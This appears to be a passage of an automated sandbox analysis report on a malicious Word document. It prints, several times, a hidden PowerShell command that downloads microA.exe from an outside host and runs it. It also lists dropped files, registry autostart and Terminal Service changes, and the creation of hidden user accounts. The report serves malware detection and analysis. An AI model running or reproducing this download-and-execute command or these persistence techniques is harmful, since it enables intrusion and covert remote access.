Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe'' Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe'' Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_004060B0 LoadLibraryA,GetProcAddress,ExitProcess, 16_2_004060B0
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 10_2_00405C1F pushad ; retf 0029h 10_2_00405C20
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 10_2_004081F4 push ss; retf 10_2_004081F7
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 10_2_00407D9F push eax; iretd 10_2_00407DBD
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 10_2_004082B1 pushad ; retf 0029h 10_2_004082B2
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 10_2_01E26920 push esp; retf 10_2_01E2692D
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 10_2_01E270C0 pushad ; retf 10_2_01E270CD
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 10_2_04E675DB push E807B45Eh; ret 10_2_04E675E1
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 10_2_04E63720 push 8B000001h; iretd 10_2_04E63725
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 10_2_04E61B5A push dword ptr [eax-42000000h]; retf 10_2_04E61B7F
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 11_2_00235C1F pushad ; retf 001Dh 11_2_00235C20
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 11_2_00237D9F push eax; iretd 11_2_00237DBD
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 11_2_002381F4 push ss; retf 11_2_002381F7
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 11_2_002382B1 pushad ; retf 001Dh 11_2_002382B2
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 11_2_00503455 push FFFFFFFCh; retf 11_2_0050345C
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 11_2_01FE1B5A push dword ptr [eax-42000000h]; retf 11_2_01FE1B7F
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 11_2_01FE3720 push 8B000001h; iretd 11_2_01FE3725
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 12_2_00265C1F pushad ; retf 001Ch 12_2_00265C20
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 12_2_00267D9F push eax; iretd 12_2_00267DBD
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 12_2_002681F4 push ss; retf 12_2_002681F7
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 12_2_002682B1 pushad ; retf 001Ch 12_2_002682B2
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 12_2_045B3720 push 8B000001h; iretd 12_2_045B3725
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 12_2_045B1B5A push dword ptr [eax-42000000h]; retf 12_2_045B1B7F
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_004011C0 push eax; ret 16_2_004011D4
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_004011C0 push eax; ret 16_2_004011FC
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_0041C225 pushad ; retn 0041h 16_2_0041C22D
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_004174D1 push ebp; retf 16_2_00417584
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_00417570 push ebp; retf 16_2_00417584
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_004011C0 push eax; ret 17_2_004011D4
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_004011C0 push eax; ret 17_2_004011FC
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_0041C225 pushad ; retn 0041h 17_2_0041C22D
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_004174D1 push ebp; retf 17_2_00417584

Persistence and Installation Behavior:

barindex
Tries to download and execute files (via powershell)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe'' Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe'' Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe'' Jump to behavior
Contains functionality to create new users
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_0040D2B8 NetUserAdd,NetLocalGroupAddMembers, 16_2_0040D2B8
Contains functionality to download and launch executables
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_0040290E URLDownloadToFileW,ShellExecuteW, 16_2_0040290E
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\microA.exe File created: C:\ProgramData\images.exe Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\microA.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\microA.exe File created: C:\Users\user\AppData\Local\Temp\microA.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\images.exe File created: C:\Program Files\Microsoft DN1\sqlmap.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\images.exe File created: C:\Windows\System32\rfxvmt.dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\microA[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\images.exe File created: C:\Users\user\AppData\Roaming\JhwfHBtD..exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\images.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\microC[1].exe Jump to dropped file
Source: C:\ProgramData\images.exe File created: C:\Users\user\AppData\Local\Temp\images.exe Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\AppData\Local\Temp\microA.exe File created: C:\ProgramData\images.exe Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\user\AppData\Local\Temp\images.exe File created: C:\Windows\System32\rfxvmt.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_0040A36F lstrcatW,GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW, 16_2_0040A36F
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_00409E2D GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW, 16_2_00409E2D
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_00413695 CreateDesktopW,AssocQueryStringW,PathFindFileNameW,CharLowerW,PathFindFileNameW,CharLowerW,SHFileOperationW,CreateDirectoryW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateProcessW,CreateProcessW,SHFileOperationW,CreateDirectoryW,GetPrivateProfileStringW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateFileW,WriteFile,CloseHandle,CreateProcessW,GetPrivateProfileStringW,CreateFileW,WriteFile,CloseHandle,CreateProcessW,CreateProcessW,CreateProcessW, 16_2_00413695
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_0040A36F lstrcatW,GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW, 17_2_0040A36F
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_00409E2D GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW, 17_2_00409E2D
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_00413695 CreateDesktopW,AssocQueryStringW,PathFindFileNameW,CharLowerW,PathFindFileNameW,CharLowerW,SHFileOperationW,CreateDirectoryW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateProcessW,CreateProcessW,SHFileOperationW,CreateDirectoryW,GetPrivateProfileStringW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateFileW,WriteFile,CloseHandle,CreateProcessW,GetPrivateProfileStringW,CreateFileW,WriteFile,CloseHandle,CreateProcessW,CreateProcessW,CreateProcessW, 17_2_00413695
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_0040A36F lstrcatW,GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW, 18_2_0040A36F
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_00409E2D GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW, 18_2_00409E2D
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_00413695 CreateDesktopW,AssocQueryStringW,PathFindFileNameW,CharLowerW,PathFindFileNameW,CharLowerW,SHFileOperationW,CreateDirectoryW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateProcessW,CreateProcessW,SHFileOperationW,CreateDirectoryW,GetPrivateProfileStringW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateFileW,WriteFile,CloseHandle,CreateProcessW,GetPrivateProfileStringW,CreateFileW,WriteFile,CloseHandle,CreateProcessW,CreateProcessW,CreateProcessW, 18_2_00413695
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_0040A36F lstrcatW,GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW, 25_2_0040A36F
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_00409E2D GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW, 25_2_00409E2D
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_00413695 CreateDesktopW,AssocQueryStringW,PathFindFileNameW,CharLowerW,PathFindFileNameW,CharLowerW,SHFileOperationW,CreateDirectoryW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateProcessW,CreateProcessW,SHFileOperationW,CreateDirectoryW,GetPrivateProfileStringW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateFileW,WriteFile,CloseHandle,CreateProcessW,GetPrivateProfileStringW,CreateFileW,WriteFile,CloseHandle,CreateProcessW,CreateProcessW,CreateProcessW, 25_2_00413695

Boot Survival:

barindex
Creates an undocumented autostart registry key
Source: C:\Windows\SysWOW64\reg.exe Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Load
Modifies existing windows services
Source: C:\Users\user\AppData\Local\Temp\images.exe Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_0040D3A8 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,GetLastError,Sleep,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 16_2_0040D3A8

Hooking and other Techniques for Hiding and Protection:

barindex
Contains functionality to hide user accounts
Source: microA.exe, 0000000A.00000002.2168254324.0000000001FFB000.00000004.00000001.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: microA.exe, 0000000A.00000002.2168254324.0000000001FFB000.00000004.00000001.sdmp String found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
Source: microA.exe, 0000000B.00000002.2168345200.0000000002266000.00000004.00000001.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: microA.exe, 0000000B.00000002.2168345200.0000000002266000.00000004.00000001.sdmp String found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
Source: microA.exe String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: microA.exe String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: microA.exe String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: images.exe String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\AppData\Local\Temp\microA.exe File opened: C:\ProgramData\images.exe:Zone.Identifier read attributes | delete
Hides user accounts
Source: C:\Users\user\AppData\Local\Temp\images.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList cIqnzxr
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BBC2BB GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW, 25_2_03BBC2BB
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
